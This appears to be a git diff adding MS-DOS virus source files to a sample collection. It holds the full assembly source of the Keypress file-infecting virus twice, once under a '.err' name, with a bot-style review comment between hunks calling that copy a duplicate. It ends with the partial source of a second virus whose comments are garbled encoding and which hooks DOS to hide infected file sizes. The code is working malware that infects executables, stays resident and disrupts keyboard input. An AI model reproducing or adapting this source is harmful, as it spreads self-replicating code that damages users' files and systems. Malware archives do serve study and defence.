+ +New_I24: mov al,0 + +New_I23: iret + +I23_Ofs dw (?) +I23_Seg dw (?) + +I24_Ofs dw (?) +I24_Seg dw (?) + +ProgSize dw (?) ; Program size in paragraphs + +New_I21: cmp ax,4B00h ; New DOS Int for DOS 3 + + jz Is_Start + jmp far dword ptr cs:[I21_Ofs] ; Jmp orig. I 21 +Is_Start: call Save_Regs + call InstCritInt ; Install new ^c and crit. err. int + mov ax,3D02h ; Open file for read and write + mov ds,R_Ds + int 21h + push cs + pop ds + jc Close_File + mov bx,ax + call Read_header + jc Close_File + call Write_virus + jc Close_File + call Write_header +Close_File: mov ah,3Eh ; Close file + int 21h + call RestCritInt ; Restore ^c and crit-err ints + call Rst_regs_int + jmp far dword ptr cs:[I21_Ofs] + +I21_Dos12: cmp ah,3Dh ; New DOS-Int for DOS 1.x and 2.x + jz Is_Open + +JmpDos: db 0EAh ; Jump Far +I21_Ofs dw (?) +I21_Seg dw (?) + +Is_Open: push ax ; Network-flags? + and al,0FCh + pop ax + jnz JmpDos ; Yes -> DOS + + call Save_Regs + + call InstCritInt ; Install new ^c and crit. err. int + + mov DS,R_Ds + or al,2 ; Write access + pushf + cli + call far cs:[I21_Ofs] ; Open file + push cs + pop ds + jc Open_Error ; Error opening -> DOS + + pushf + mov [R_Ax],ax ; Save handle + mov bx,ax + + call Chk_Inf ; Check infection is possible + jc No_Infect ; No -> quit + + call Read_header + jc No_Infect + + call Write_virus + jc No_Infect + call Write_header +No_Infect: call Go_file_beg ; Go to begin of file + call RestCritInt ; Restore ^c and crit-err ints + call Rst_regs_int + popf + retf 2 +Open_Error: call RestCritInt ; Restore ^c and crit-err ints + call Rst_regs_int + jmp short JmpDos + + +;*** Proc: Buffer for header of program to infect *** + +Head_buf dw 0Ch dup (?) + + +;*** Proc: Install new ^C and crit. err. interrupt *** + +InstCritInt: push ax + push bx + push dx + push ds + push es + push cs + pop ds + mov ax,3523h ; Get Ctrl-Break Int Addr + int 21h + mov I23_Ofs,bx + mov I23_Seg,es + mov ax,3524h ; Get Crit. 
Err Int Addr + int 21h + mov I24_Ofs,bx + mov I24_Seg,es + mov ax,2523h + mov dx,offset New_I23 ; Install new Ctrl-Break Int + int 21h + mov ax,2524h ; Install new Crit. Err Int + mov dx,offset New_I24 + int 21h + pop es + pop ds + pop dx + pop bx + pop ax + ret + + +;*** Proc: Restore orig. ctrl-break and crit. err. interrupt *** + +RestCritInt: mov ax,2524h ; Rest. orig. crit. err int + lds dx,dword ptr cs:[I24_Ofs] + int 21h + mov ax,2523h ; Rest. orig. ctrl-break int + lds dx,dword ptr cs:[I23_Ofs] + int 21h + push cs + pop ds + ret + + +;*** Read header of file *** + +Read_header: mov ah,3Fh + mov dx,offset Head_buf + mov cx,18h + int 21h + jc HeadRead_Err ; Error reading, don't infect + + call Check_infect ; Check file already infected; if not, save data + jc HeadRead_Err ; Error, quit + + call Calc_data ; Calculate data for infected file + jc HeadRead_Err ; Error, quit + +HeadRead_Err: ret + + +;*** Proc: Write virus, and for .COM files, write first 16 bytes behind virus *** + +Write_virus: mov ah,40h ; Write virus behind program + mov cx,[VirSize] + mov dx,100h + int 21h + jc Err_Writ ; Write error, quit + cmp ax,cx + jnz Err_Writ ; ' ' ' ' ' ' + test byte ptr [Com_or_exe],1 + jz First_Write + ret + +First_Write: mov ah,40h ; Write orig. 1st 16 bytes behind virus + mov cx,10h + mov dx,offset Head_buf + int 21h + jc Err_Writ ; Write error, quit + cmp ax,cx + jnz Err_Writ ; ' ' ' ' ' ' + clc ; End procedure, no error + ret + +Err_Writ: stc ; End procedure, error + ret + + +;*** Proc: .COM: Write jump-to-virus, .EXE: Write header *** + +Write_header: call Go_file_beg ; Go to begin of file + test byte ptr [Com_or_exe],1 ; .EXE-file? 
+ jnz Exe_header + mov ah,40h ; .COM file - Write 'EB 02' + mov cx,2 + mov dx,offset EB02 + int 21h + mov ah,40h ; Write program-size in pars + mov cx,2 + mov dx,offset ProgSize + int 21h + mov ah,40h ; Write rest of begin of virus + mov cx,0Ch + mov dx,104h + int 21h + ret + +Exe_header: mov ah,40h ; Write in File + mov cx,18h + mov dx,offset Head_buf + int 21h + ret + + +;*** Proc: Change file pointer *** + +Cng_file_ptr: mov ax,4200h + int 21h + ret + + +;*** Proc: Go to begin of file *** + +Go_file_beg: xor cx,cx ; Filepointer = 0 + xor dx,dx + call Cng_file_ptr ; Change File Pointer + ret + + +;*** Proc: Check file is already infected *** + +Check_infect: mov si,104h + mov di,offset Head_buf+4 + push cs + pop es + mov byte ptr [Com_or_exe],0 ; Flag for .COM + cmp word ptr [di-04],5A4Dh ; Is .EXE? + jz Is_Exe + mov cx,0Ch ; No, .COM file + cld + repz ; Already infected? + cmpsb + jnz Do_Infect ; Not yet +Dont_Infect: stc + ret +Do_Infect: clc + ret +Is_Exe: mov byte ptr [Com_or_exe],1 ; Flag for .EXE + mov cx,[offset Head_buf+14h] ; cx = Prog-IP + cmp cx,offset VirBegin ; Same as Vir-IP? + jz Dont_Infect ; Yes, quit + cmp word ptr [offset Head_buf+0Ch],0 ; Max extra pars=0? + jz Dont_Infect ; Yes, quit + mov [Exe_ip],cx ; Save prog-IP + mov cx,[Head_buf+16h] + mov [Exe_cs],cx ; Save prog-cs + mov cx,[Head_buf+0Eh] + mov [R_ss],cx ; Save prog-SS + mov cx,[Head_buf+10h] + mov [R_sp],cx ; Save prog-SP + jmp short Do_Infect + + +;*** Proc: Calculate data for infection *** + +Calc_data: mov ax,4202h ; Go to EOF + xor cx,cx + xor dx,dx + int 21h + test al,0Fh ; Size mod 16 = 0 (File is exact x paragraps)? + jz No_par_add ; Yes, no extra par added + add ax,10h ; Add paragraph + adc dx,0 ; Overflow -> Inc dx + and ax,0FFF0h ; Make paragraphs +No_par_add: test byte ptr [Com_or_exe],1 + jnz Calc_exe + or dx,dx + jnz not_infect + cmp ax,[maxcomsize] ; File too big? + ja not_infect ; Yes, quit + cmp ax,[VirSize] ; File too small? 
+ jbe Not_Infect ; Yes, quit + mov [ProgSize],ax ; Save program-size + mov cl,4 + shr word ptr [ProgSize],cl ; In paragraphs + mov dx,ax + xor cx,cx + call Cng_file_ptr ; Go to EOF + clc + ret +Not_Infect: stc + ret + +Calc_exe: push ax + push dx + add ax,100h ; 100 bytes stack + adc dx,0 ; Overflow - inc dx + mov cx,dx + mov dx,ax + call Cng_file_ptr ; Go to EOF + push bx + add ax,[VirSize] ; New exe-length + adc dx,0 + mov bx,200h ; For header: / 512 + div bx + or dx,dx + jz No_Correct + inc ax ; Files below 2.000.000h bytes - length correction +No_Correct: mov [Head_buf+2],dx ; Save new file-length + mov [Head_buf+4],ax ; ' ' ' ' ' ' ' ' + pop bx + pop dx + pop ax + call Calc_cs_ss + mov word ptr [Head_buf+10h],100h ; Prog-SP=100h + mov word ptr [Head_buf+14h],offset VirBegin ; Set prog-IP + clc + ret + + +;*** Proc: Calculate new CS and SS for .EXE file *** + +Calc_cs_ss: push cx + mov cx,4 +Cs_ss_lp: shr dx,1 + rcr ax,1 + loop Cs_ss_lp + sub ax,[Head_buf+8] ; Size of header + sbb dx,0 + mov [Head_buf+0Eh],ax ; Save prog-SS + mov [Head_buf+16h],ax ; Save prog-cs + pop cx + ret + + +;*** Check infection is possible *** + +Chk_Inf: call Chk_exec ; Check file is executable + jb Not_exec + call Get_attr ; Check file has no SYS attr +Not_Exec: ret + + +;*** Search-paths *** + +Com_path db '.COM',0 + +Exe_path db '.EXE',0 + + +;*** Check file is executable (.COM / .EXE) + +Chk_Exec: push es + mov es,R_ds + mov di,dx + xor al,al + mov cx,80h + cld + repnz ; Search '.' + scasb + jnz not_inf ; No '.' 
found + dec di + push di + mov si,offset Com_path+4 + mov cx,4 + std + repz ; Check '.COM' + cmpsb + pop di + jnz no_com ; No .COM + clc + jmp short Infect + nop +Not_Inf: stc + +Infect: cld + pop es + ret +No_Com: mov si,offset Exe_path+4 + mov cx,4 + repz ; Check '.EXE' + cmpsb + jnz not_inf ; No .EXE either - not executable + clc + jmp short infect + +Get_Attr: push ds + mov ax,4300h ; Get FileAttr + xor cx,cx + mov ds,R_ds + int 21h + pop ds + jb Bad_Attr ; Error - don't infect + test cx,4 ; System-Attr? + jnz Bad_Attr ; Yes, don't infect + clc + ret + +Bad_Attr: stc + ret + +First_bytes: int 20h ; First bytes of orig. program - here just 'Go to DOS' + dw (?) + mov bx,cs ; Overwrites the begin + add bx,[102h] + push bx + mov bx,offset VirBegin + push bx + retf + +;****************************************************************************; +; ; +; -=][][][][][][][][][][][][][][][=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] [=- ; +; -=] For All Your H/P/A/V Files [=- ; +; -=] SysOp: Peter Venkman [=- ; +; -=] [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=][][][][][][][][][][][][][][][=- ; +; ; +; *** NOT FOR GENERAL DISTRIBUTION *** ; +; ; +; This File is for the Purpose of Virus Study Only! It Should not be Passed ; +; Around Among the General Public. It Will be Very Useful for Learning how ; +; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; +; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; +; Experience can Turn it Into a far More Malevolent Program Than it Already ; +; Is. Keep This Code in Responsible Hands! ; +; ; +;****************************************************************************; diff --git a/MSDOS/Virus.MSDOS.Unknown.keypress.err b/MSDOS/Virus.MSDOS.Unknown.keypress.err new file mode 100644 index 00000000..dfa93406 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.keypress.err 
@@ -0,0 +1,739 @@ +;****************************************************************************; +; ; +; -=][][][][][][][][][][][][][][][=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] [=- ; +; -=] For All Your H/P/A/V Files [=- ; +; -=] SysOp: Peter Venkman [=- ; +; -=] [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=][][][][][][][][][][][][][][][=- ; +; ; +; *** NOT FOR GENERAL DISTRIBUTION *** ; +; ; +; This File is for the Purpose of Virus Study Only! It Should not be Passed ; +; Around Among the General Public. It Will be Very Useful for Learning how ; +; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; +; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; +; Experience can Turn it Into a far More Malevolent Program Than it Already ; +; Is. Keep This Code in Responsible Hands! ; +; ; +;****************************************************************************; +;******************************************************** +; Source code of the Keypress Virus - Made by XSTC +; Made in A86 v3.07 +; +; The Keypress Virus installs itself in top of DOS +; memory, without using DOS resident functions. It will +; hook int 1Ch (timer) and 21h (DOS) and will copy every +; 10 minutes during 2 seconds the keys you press five +; times (so if you press '1' it will be '111111') - if +; you press no key, it will usually give ESCs. +; +; In DOS 3+ it spreads to every file executed - so it +; can, besides COM/EXE, infect DRV/OVL/etc. +; It also spreads itself in DOS 1 and 2 with a special +; routine - in this case only COM/EXE files will be +; infected. +; +; It adds, after making full paragraphs of the file +; length, 1232 bytes to COM-files and 1216 to EXE. +; +; This code is only made to show the possibilities and +; dangers of a virus. It is only intended for research +; purposes - spreading a virus is prohibited by law. 
+; +; NOTE - The compiled code is not 100% compatible with +; the Keypress virus. A86 compiles the 'ADD BX,AX' and +; 'MOV DI,SI' different. This has totally no effect +; on the program. +;******************************************************** + +; After compiling the new virus, enter the new size in paragraphs in VirParSize +; and compile again. + +VirParSize equ 4Ch ; Size of the original KeyPress virus + +VirStart: jmp long VirBegin + db 0 + +ComStart: mov bx,cs ; When the virus has infected a .COM file, + add bx,[102h] ; this is the jump to the virus. Actually, + push bx ; this code is overwritten with the code + mov bx,offset VirBegin ; in the end of the virus. + push bx + retf + +EB02 dw 02EBh ; 'jmp 104' - first 2 bytes in .COM file + +VirSize dw VirParSize shl 4 ; Size of virus in whole pars + +VirPars dw VirParSize + 1 ; Size of virus in pars+1 + +MaxComSize dw 0FF00h-VirParSize ; Max. size .COM file to infect (100h stack) + +Com_or_exe db 00h ; 0 = Com-File, 1 = Exe-File +R_Ax dw (?) +R_Bx dw (?) +R_Cx dw (?) +R_Dx dw (?) +R_Di dw (?) +R_Si dw (?) +R_Bp dw (?) +R_Es dw (?) +R_Ds dw (?) +R_SS dw (?) +R_SP dw (?) + +Exe_CS dw (?) +Exe_IP dw (?) + + +VirBegin: call Save_Regs ; Start of virus + call Fix_cs_ss ; Fix CS and SS of orig. prog (for .EXE files) + call Get_cs_ip ; Get CS and IP of original prog + call Check_res ; Check virus already resident + jb Exit_inst ; Yes, quit + + call Inst_mem ; Install in memory + jb Exit_inst ; Error, quit + + call Inst_ints ; Hook interrupts +Exit_Inst: jmp short Rst_regs_prg + nop + +Jmp_Prg: db 0EAh ; Jump to original program +PrgOfs dw (?) +PrgSeg dw (?) + +Check_res: push ds + xor bx,bx + mov ds,bx + mov bx,600h ; Unused word in memory + cmp word ptr [bx],1 ; Already installed? 
+ jz Installed ; Yes + + mov word ptr [bx],1 ; No + stc + +Installed: cmc + pop ds + ret + + +;*** For .EXE: Fix orig-prog CS and SS *** + +Fix_cs_ss: test byte ptr [Com_or_exe],1 + jz no_exe + + mov ax,es + add ax,10h + add Exe_cs,ax + add R_ss,ax + +No_Exe: ret + + +;*** Get CS + IP of orig. program, and for .COM: Restore first 16 bytes *** + +Get_cs_ip: mov ax,[Exe_cs] + mov bx,[Exe_ip] + test byte ptr [Com_or_exe],1 + jnz No_rest ; .EXE file: no restore of first bytes + + mov ax,es + mov bx,100h + mov cx,10h + mov si,offset First_bytes + mov di,100h + cld + repz ; Restore first 16 bytes (.COM file) + movsb + +No_rest: mov [Prgseg],ax + mov [Prgofs],bx + ret + + +;*** Proc: Save the registers to restore them after the virus has ended *** + +Save_Regs: mov cs:R_ds,ds + push cs + pop ds + mov R_ax,ax + mov R_bx,bx + mov R_cx,cx + mov R_dx,dx + mov R_di,di + mov R_si,si + mov R_bp,bp + mov R_es,es + ret + + +;*** Restore regs for original program *** + +Rst_regs_prg: mov ax,R_ax + mov bx,R_bx + mov cx,R_cx + mov dx,R_dx + mov bp,R_bp + mov di,R_di + mov si,R_si + mov es,R_es + test byte ptr [Com_or_exe],1 + jz No_StackRest ; No stack restore for .COM files + + cli + mov ss,[R_ss] ; Restore .EXE stack + mov sp,[R_sp] + sti + +No_StackRest: mov ds,R_ds + jmp short jmp_prg + + +;*** Restore regs for interrupts *** + +Rst_regs_int: mov ax,R_ax + mov bx,R_bx + mov cx,R_cx + mov dx,R_dx + mov bp,R_bp + mov di,R_di + mov si,R_si + mov es,R_es + mov ds,R_ds + ret + + +;*** Proc: Search for last MCB *** + +Last_MCB: push ds + mov bx,es + dec bx + +Next_MCB: mov ds,bx + cmp byte ptr [0],5Ah ; Last MCB? + jz Is_last ; Yes + inc bx + add bx,[3] ; Go to next + cmp bx,0A000h ; In ROM? + jb Next_MCB ; No, try next one + +Is_Last: pop ds + ret + + +;*** Proc: Install virus in end of memory *** + +Inst_Mem: call Last_mcb ; Search last MCB + cmp bx,0A000h ; In ROM? 
+ jb Not_ROM ; No, continue + +No_Inst: push cs ; Yes, quit + pop ds + stc ; Error, virus not installed + ret + +Not_ROM: mov ds,bx + mov ax,[3] ; AX = Size last MCB + sub ax,cs:[VirPars] ; - (Virussize in pars+1) + jbe no_inst ; Not enough memory, quit + cmp ax,800h + jb no_inst ; Less than 2048 pars free, quit + mov [3],ax ; Give program less space to install virus + add bx,ax + inc bx ; BX = seg where virus comes + mov es:[2],bx ; Enter in PSP, program not allowed there + sub bx,10h ; - 10h pars (virus starts at 100h) + push bx + push cs + pop ds + pop es + mov si,100h + mov di,si + mov cx,[VirSize] ; CX = virussize + cld + repz ; Copy virus to virus-segment + movsb + clc ; No error, virus installed + ret + + +;*** Install new interrupts (1C - Timer Tick, 21 - DOS) *** + +Inst_Ints: push es + pop ds + mov word ptr [Ticks],0 + mov ax,351Ch ; Get Addr Timer Tick + int 21h + mov I1c_ofs,bx + mov I1c_seg,es + mov ax,3521h ; Get Addr DOS-Int + int 21h + mov I21_ofs,bx + mov I21_seg,es + mov ax,251Ch + mov dx,offset New_I1c + int 21h ; Install New Timer-Tick Int + mov dx,offset I21_dos12 + push dx + mov ah,30h ; Get DOS-Version + int 21h + pop dx + cmp al,3 ; Below 3.0? + jb DosBel3 + mov dx,offset new_I21 ; No, new int +DosBel3: mov ax,2521h ; Install new DOS-Int + int 21h + push cs + pop ds + ret + + +;*** Proc: NEW 1C (TIMER TICK) INTERRUPT *** +; Every 10 minutes this routine sends during 2 sec. 180 extra keys to the +; keyboard-interrupt. + +Ticks dw (?) + +New_I1c: inc word ptr cs:[Ticks] ; Increment 'Ticks after virus loaded' + cmp word ptr cs:[Ticks],2A30h ; 10 minutes passed? + jb org_I1c ; No, go to orig. I1c + cmp word ptr cs:[Ticks],2A54h ; 2 sec. passed? + jbe screw_keys ; Not yet, give ESCs + mov word ptr cs:[Ticks],0 ; Time-counter to 0 + jmp short Org_I1c ; Go to orig. I1c +Screw_Keys: push cx + mov cx,5 ; 5 times / tick +Put_Key: int 9 ; Give extra key + loop Put_key + pop cx +Org_I1c: db 0EAh ; Jump far to orig. I1c +I1c_Ofs dw (?) +I1c_Seg dw (?) 
+ +New_I24: mov al,0 + +New_I23: iret + +I23_Ofs dw (?) +I23_Seg dw (?) + +I24_Ofs dw (?) +I24_Seg dw (?) + +ProgSize dw (?) ; Program size in paragraphs + +New_I21: cmp ax,4B00h ; New DOS Int for DOS 3 + + jz Is_Start + jmp far dword ptr cs:[I21_Ofs] ; Jmp orig. I 21 +Is_Start: call Save_Regs + call InstCritInt ; Install new ^c and crit. err. int + mov ax,3D02h ; Open file for read and write + mov ds,R_Ds + int 21h + push cs + pop ds + jc Close_File + mov bx,ax + call Read_header + jc Close_File + call Write_virus + jc Close_File + call Write_header +Close_File: mov ah,3Eh ; Close file + int 21h + call RestCritInt ; Restore ^c and crit-err ints + call Rst_regs_int + jmp far dword ptr cs:[I21_Ofs] + +I21_Dos12: cmp ah,3Dh ; New DOS-Int for DOS 1.x and 2.x + jz Is_Open + +JmpDos: db 0EAh ; Jump Far +I21_Ofs dw (?) +I21_Seg dw (?) + +Is_Open: push ax ; Network-flags? + and al,0FCh + pop ax + jnz JmpDos ; Yes -> DOS + + call Save_Regs + + call InstCritInt ; Install new ^c and crit. err. int + + mov DS,R_Ds + or al,2 ; Write access + pushf + cli + call far cs:[I21_Ofs] ; Open file + push cs + pop ds + jc Open_Error ; Error opening -> DOS + + pushf + mov [R_Ax],ax ; Save handle + mov bx,ax + + call Chk_Inf ; Check infection is possible + jc No_Infect ; No -> quit + + call Read_header + jc No_Infect + + call Write_virus + jc No_Infect + call Write_header +No_Infect: call Go_file_beg ; Go to begin of file + call RestCritInt ; Restore ^c and crit-err ints + call Rst_regs_int + popf + retf 2 +Open_Error: call RestCritInt ; Restore ^c and crit-err ints + call Rst_regs_int + jmp short JmpDos + + +;*** Proc: Buffer for header of program to infect *** + +Head_buf dw 0Ch dup (?) + + +;*** Proc: Install new ^C and crit. err. interrupt *** + +InstCritInt: push ax + push bx + push dx + push ds + push es + push cs + pop ds + mov ax,3523h ; Get Ctrl-Break Int Addr + int 21h + mov I23_Ofs,bx + mov I23_Seg,es + mov ax,3524h ; Get Crit. 
Err Int Addr + int 21h + mov I24_Ofs,bx + mov I24_Seg,es + mov ax,2523h + mov dx,offset New_I23 ; Install new Ctrl-Break Int + int 21h + mov ax,2524h ; Install new Crit. Err Int + mov dx,offset New_I24 + int 21h + pop es + pop ds + pop dx + pop bx + pop ax + ret + + +;*** Proc: Restore orig. ctrl-break and crit. err. interrupt *** + +RestCritInt: mov ax,2524h ; Rest. orig. crit. err int + lds dx,dword ptr cs:[I24_Ofs] + int 21h + mov ax,2523h ; Rest. orig. ctrl-break int + lds dx,dword ptr cs:[I23_Ofs] + int 21h + push cs + pop ds + ret + + +;*** Read header of file *** + +Read_header: mov ah,3Fh + mov dx,offset Head_buf + mov cx,18h + int 21h + jc HeadRead_Err ; Error reading, don't infect + + call Check_infect ; Check file already infected; if not, save data + jc HeadRead_Err ; Error, quit + + call Calc_data ; Calculate data for infected file + jc HeadRead_Err ; Error, quit + +HeadRead_Err: ret + + +;*** Proc: Write virus, and for .COM files, write first 16 bytes behind virus *** + +Write_virus: mov ah,40h ; Write virus behind program + mov cx,[VirSize] + mov dx,100h + int 21h + jc Err_Writ ; Write error, quit + cmp ax,cx + jnz Err_Writ ; ' ' ' ' ' ' + test byte ptr [Com_or_exe],1 + jz First_Write + ret + +First_Write: mov ah,40h ; Write orig. 1st 16 bytes behind virus + mov cx,10h + mov dx,offset Head_buf + int 21h + jc Err_Writ ; Write error, quit + cmp ax,cx + jnz Err_Writ ; ' ' ' ' ' ' + clc ; End procedure, no error + ret + +Err_Writ: stc ; End procedure, error + ret + + +;*** Proc: .COM: Write jump-to-virus, .EXE: Write header *** + +Write_header: call Go_file_beg ; Go to begin of file + test byte ptr [Com_or_exe],1 ; .EXE-file? 
+ jnz Exe_header + mov ah,40h ; .COM file - Write 'EB 02' + mov cx,2 + mov dx,offset EB02 + int 21h + mov ah,40h ; Write program-size in pars + mov cx,2 + mov dx,offset ProgSize + int 21h + mov ah,40h ; Write rest of begin of virus + mov cx,0Ch + mov dx,104h + int 21h + ret + +Exe_header: mov ah,40h ; Write in File + mov cx,18h + mov dx,offset Head_buf + int 21h + ret + + +;*** Proc: Change file pointer *** + +Cng_file_ptr: mov ax,4200h + int 21h + ret + + +;*** Proc: Go to begin of file *** + +Go_file_beg: xor cx,cx ; Filepointer = 0 + xor dx,dx + call Cng_file_ptr ; Change File Pointer + ret + + +;*** Proc: Check file is already infected *** + +Check_infect: mov si,104h + mov di,offset Head_buf+4 + push cs + pop es + mov byte ptr [Com_or_exe],0 ; Flag for .COM + cmp word ptr [di-04],5A4Dh ; Is .EXE? + jz Is_Exe + mov cx,0Ch ; No, .COM file + cld + repz ; Already infected? + cmpsb + jnz Do_Infect ; Not yet +Dont_Infect: stc + ret +Do_Infect: clc + ret +Is_Exe: mov byte ptr [Com_or_exe],1 ; Flag for .EXE + mov cx,[offset Head_buf+14h] ; cx = Prog-IP + cmp cx,offset VirBegin ; Same as Vir-IP? + jz Dont_Infect ; Yes, quit + cmp word ptr [offset Head_buf+0Ch],0 ; Max extra pars=0? + jz Dont_Infect ; Yes, quit + mov [Exe_ip],cx ; Save prog-IP + mov cx,[Head_buf+16h] + mov [Exe_cs],cx ; Save prog-cs + mov cx,[Head_buf+0Eh] + mov [R_ss],cx ; Save prog-SS + mov cx,[Head_buf+10h] + mov [R_sp],cx ; Save prog-SP + jmp short Do_Infect + + +;*** Proc: Calculate data for infection *** + +Calc_data: mov ax,4202h ; Go to EOF + xor cx,cx + xor dx,dx + int 21h + test al,0Fh ; Size mod 16 = 0 (File is exact x paragraps)? + jz No_par_add ; Yes, no extra par added + add ax,10h ; Add paragraph + adc dx,0 ; Overflow -> Inc dx + and ax,0FFF0h ; Make paragraphs +No_par_add: test byte ptr [Com_or_exe],1 + jnz Calc_exe + or dx,dx + jnz not_infect + cmp ax,[maxcomsize] ; File too big? + ja not_infect ; Yes, quit + cmp ax,[VirSize] ; File too small? 
+ jbe Not_Infect ; Yes, quit + mov [ProgSize],ax ; Save program-size + mov cl,4 + shr word ptr [ProgSize],cl ; In paragraphs + mov dx,ax + xor cx,cx + call Cng_file_ptr ; Go to EOF + clc + ret +Not_Infect: stc + ret + +Calc_exe: push ax + push dx + add ax,100h ; 100 bytes stack + adc dx,0 ; Overflow - inc dx + mov cx,dx + mov dx,ax + call Cng_file_ptr ; Go to EOF + push bx + add ax,[VirSize] ; New exe-length + adc dx,0 + mov bx,200h ; For header: / 512 + div bx + or dx,dx + jz No_Correct + inc ax ; Files below 2.000.000h bytes - length correction +No_Correct: mov [Head_buf+2],dx ; Save new file-length + mov [Head_buf+4],ax ; ' ' ' ' ' ' ' ' + pop bx + pop dx + pop ax + call Calc_cs_ss + mov word ptr [Head_buf+10h],100h ; Prog-SP=100h + mov word ptr [Head_buf+14h],offset VirBegin ; Set prog-IP + clc + ret + + +;*** Proc: Calculate new CS and SS for .EXE file *** + +Calc_cs_ss: push cx + mov cx,4 +Cs_ss_lp: shr dx,1 + rcr ax,1 + loop Cs_ss_lp + sub ax,[Head_buf+8] ; Size of header + sbb dx,0 + mov [Head_buf+0Eh],ax ; Save prog-SS + mov [Head_buf+16h],ax ; Save prog-cs + pop cx + ret + + +;*** Check infection is possible *** + +Chk_Inf: call Chk_exec ; Check file is executable + jb Not_exec + call Get_attr ; Check file has no SYS attr +Not_Exec: ret + + +;*** Search-paths *** + +Com_path db '.COM',0 + +Exe_path db '.EXE',0 + + +;*** Check file is executable (.COM / .EXE) + +Chk_Exec: push es + mov es,R_ds + mov di,dx + xor al,al + mov cx,80h + cld + repnz ; Search '.' + scasb + jnz not_inf ; No '.' 
found + dec di + push di + mov si,offset Com_path+4 + mov cx,4 + std + repz ; Check '.COM' + cmpsb + pop di + jnz no_com ; No .COM + clc + jmp short Infect + nop +Not_Inf: stc + +Infect: cld + pop es + ret +No_Com: mov si,offset Exe_path+4 + mov cx,4 + repz ; Check '.EXE' + cmpsb + jnz not_inf ; No .EXE either - not executable + clc + jmp short infect + +Get_Attr: push ds + mov ax,4300h ; Get FileAttr + xor cx,cx + mov ds,R_ds + int 21h + pop ds + jb Bad_Attr ; Error - don't infect + test cx,4 ; System-Attr? + jnz Bad_Attr ; Yes, don't infect + clc + ret + +Bad_Attr: stc + ret + +First_bytes: int 20h ; First bytes of orig. program - here just 'Go to DOS' + dw (?) + mov bx,cs ; Overwrites the begin + add bx,[102h] + push bx + mov bx,offset VirBegin + push bx + retf + +;****************************************************************************; +; ; +; -=][][][][][][][][][][][][][][][=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] [=- ; +; -=] For All Your H/P/A/V Files [=- ; +; -=] SysOp: Peter Venkman [=- ; +; -=] [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=][][][][][][][][][][][][][][][=- ; +; ; +; *** NOT FOR GENERAL DISTRIBUTION *** ; +; ; +; This File is for the Purpose of Virus Study Only! It Should not be Passed ; +; Around Among the General Public. It Will be Very Useful for Learning how ; +; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; +; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; +; Experience can Turn it Into a far More Malevolent Program Than it Already ; +; Is. Keep This Code in Responsible Hands! ; +; ; +;****************************************************************************; diff --git a/MSDOS/Virus.MSDOS.Unknown.kiis.asm b/MSDOS/Virus.MSDOS.Unknown.kiis.asm new file mode 100644 index 00000000..2fa384b9 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.kiis.asm 
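Review bot: As far as it is visible here, this `.err` file is a copy of the Keypress source committed just before it rather than an error listing — its tail from `New_I24: mov al,0` through the closing banner matches the preceding hunk line for line, and nothing in it reads like assembler diagnostics despite the extension. The header itself says the source was built with A86 v3.07, so the `.err` name looks like a mis-saved duplicate rather than a distinct sample; dropping it, or renaming it to the `.asm` it mirrors, would keep the collection deduplicated. If it is kept, a one-line note at the top such as `; duplicate of Virus.MSDOS.Unknown.keypress.asm (same build, same 4Ch-paragraph VirParSize)` would stop analysts diffing the two for a variant that does not exist.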
@@ -0,0 +1,269 @@ + +;************************************************************************; +;* T®§¨ Virus ¥ ­ ¯° ¢¥­ ­  25.10.1991 £. ¢ *; +;* *; +;* ‘“ " ‘¢. Š«¨¬¥­² ޵°¨¤±ª¨ " ¢ 17:18.30 hour *; +;* *; +;* ±² ¿ 316 ­  ”.Œ.ˆ. *; +;************************************************************************; + +start: jmp short begin + db (00h) + db (53h) ; ‡  ° §¯®§­ ¢ ­¥ ­  ¢¨°³±  + db (4bh) ; „ «¨ ´ ©«  ¥ § ° §¥­ + int 20h +okey: db (0b8h) + db (03h) + db (00h) + db (0cdh) + db (10h) + +begin: push cx ; + CALL F1 ; +F1: POP SI ; ‡  ¢º§±² ­®¢¿¢ ­¥ ­  ¯º°¢¨²¥ 5 ¡ ©²  + SUB SI,09 ; + PUSH SI ; + cld ; + mov di,100h ; + mov cx,5 ; + rep movsb ; + jmp ding2 + +new21: pushf ; CALL ªº¬ ®°¨£¨­ «­®²® INT 21h ­  + push cs ; IBMDOS.COM - ± ¶¥« ¤  ­¥ ²¥ µ¢ - + call Word ptr cs:[8c0h] ; ­ ² ­¿ª®© ¯°®£° ¬¨ §  ¢¨°³±¨ + ret ; ª ²® Anti4us.exe, NDD ¨ ².­. + +int21h: STI + cmp ah,4bh ; °¨ ±² °²¨° ­¥ ­  ´ ©« + jz mm ; + cmp ah,11h ; °¨ ²º°±¥­¥ ­  ¯º°¢¨ ¨ ¢²®°¨ ´ ©« + jz home ; ± ¶¥« ¯°¨ DIR ¤  ±ª°¨¢  ¢¨°³± . + cmp ah,12h ; + jz home + jmp int1hh + +home: call new21 ; °®¶¥¤³°  ª ²® ¯°¨ DIR ¯°®¢¥°¿¢  + push ax ; ¤ «¨ · ±  ¥ 10:26 ¨ , ª® ¥ §­ ·¨ + push bx ; ´ ©«  ¥ § ° §¥­ ¨ ¨§¢ ¦¤  ¤º«¦¨­ - + push es ; ²  ­  ¢¨°³±  ¤  ­¥ ±¥ § ¡¥«¿§¢  + ; ®£®«¥¬¿¢ ­¥²® ­  ´ ©« . + mov ah,2fh ; ‚§¥¬  DTA ¢ ES:BX . — ±  ¥ ¢ bx+1eh + call new21 ; ’³ª ¥ 10:26 ; + mov ax,534bh + cmp Word ptr es:[bx+1eh],ax + jnz ox + mov ax,End-Okey+3 + sub Word ptr es:[bx+24h],ax +ox: 